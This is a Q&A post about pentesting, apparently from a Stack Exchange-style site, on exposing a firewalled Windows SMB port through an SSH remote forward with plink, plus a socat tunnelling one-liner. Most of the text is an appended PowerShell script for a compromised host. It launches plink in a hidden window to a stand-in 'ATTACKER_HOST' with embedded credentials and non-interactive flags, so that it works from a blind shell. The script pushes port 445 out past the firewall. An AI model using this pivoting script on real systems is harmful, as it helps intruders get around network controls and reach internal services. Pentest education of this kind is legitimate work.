Windows – How to forward external port to internal port using plink

Tags: ports, ssh, windows

For a penetration test where I have shell access to a computer running an old Windows, I'd like to forward port 4450 to 127.0.0.1:445 because the firewall is blocking 445 externally.

I'm stuck on the following:

plink -L 4450:127.0.0.1:445 SSH-Server

According to the documentation I've found, I'd have to specify an SSH-Server. But all documentation I've found just uses an SSH-Server in the same network. To forward it to a localhost port, that wouldn't help.

Do I have to install an SSH-Server on that machine or are there other ways?

Best Answer

If you have an ssh client on the Windows system, and you can establish SSH outbound to a system you control, then you can use a remote port forward, i.e. with option -R. This is effectively the opposite of -L, it sets up a listener on the remote (connected to) and forwards back [sic] through the system you're connecting from.

So, run ssh/putty/plink on the windows system with -R 4450:127.0.0.1:445 or equivalent, and log in to an sshd you control. You can then connect to 127.0.0.1:4450 on that system.

Depending on the nature of your "shell access", other options may include running socat or netcat across it, e.g.:

socat -ddd SYSTEM:"ssh somewhere 'socat TCP4-LISTEN:4450 STDIO'"  TCP:127.0.0.1:445

Note this gets you a single connection back only, you need socat on each side.
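The remote-forward approach from the answer above, written out as a complete sequence as it would be typed into the shell held on the Windows target. This is an added example, not code from the original post: plink.exe in the current directory, the SSH server name ATTACKER_HOST, the account "tunnel", its password and the host-key fingerprint are all placeholders you replace with your own. The flags matter more than the values: without -batch and a pinned -hostkey, the first connection from a machine that has never seen your server stops at the "Store key in cache?" prompt, which a blind shell can never answer.

```powershell
# Added example: start a plink remote port forward from a Windows target you
# have shell access to, back to an SSH server you control (the original post
# only names the -R option; everything below is assumed, not from the post).
$plink   = ".\plink.exe"
$sshHost = "ATTACKER_HOST"      # assumption: your SSH server, reachable outbound on 22
$sshUser = "tunnel"             # assumption: unprivileged account on that server
$sshPass = "CHANGEME"           # assumption: its password; prefer "-i key.ppk" since
                                # -pw is visible to anyone listing processes on the target
$hostKey = "SHA256:REPLACE_WITH_FINGERPRINT"   # assumption: sshd host-key fingerprint as
                                # shown by `ssh-keygen -lf /etc/ssh/ssh_host_ed25519_key.pub`

# -N       : open no remote shell, only the tunnel
# -batch   : never wait on an interactive prompt (a blind shell would hang there)
# -hostkey : pin the server key, otherwise -batch aborts on an unknown host
# -R       : listen on the SSH server's loopback port 4450 and forward each
#            connection back to 127.0.0.1:445 on this Windows host, which is
#            the direction the firewall blocks
$plinkArgs = @(
    "-N", "-batch",
    "-hostkey", $hostKey,
    "-l", $sshUser, "-pw", $sshPass,
    "-R", "4450:127.0.0.1:445",
    $sshHost
)

$proc = Start-Process -FilePath $plink -ArgumentList $plinkArgs -WindowStyle Hidden -PassThru
Start-Sleep -Seconds 5

if ($proc.HasExited) {
    # Typical causes: wrong fingerprint, bad credentials, or outbound 22 filtered
    Write-Output "plink exited with code $($proc.ExitCode); check host key, credentials and outbound filtering"
} else {
    Write-Output "plink running as PID $($proc.Id); tunnel should be up"
    Write-Output "on $sshHost verify with: ss -ltn 'sport = :4450'  then  smbclient -L 127.0.0.1 -p 4450 -U user"
}
```

On the SSH server the listener is bound to 127.0.0.1 only (sshd's default GatewayPorts no), so tools are pointed at 127.0.0.1:4450, not at the server's public address. On a target that ships the built-in OpenSSH client, the equivalent is `ssh -N -R 4450:127.0.0.1:445 tunnel@ATTACKER_HOST`; it needs the same care with the first-connection host-key prompt.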
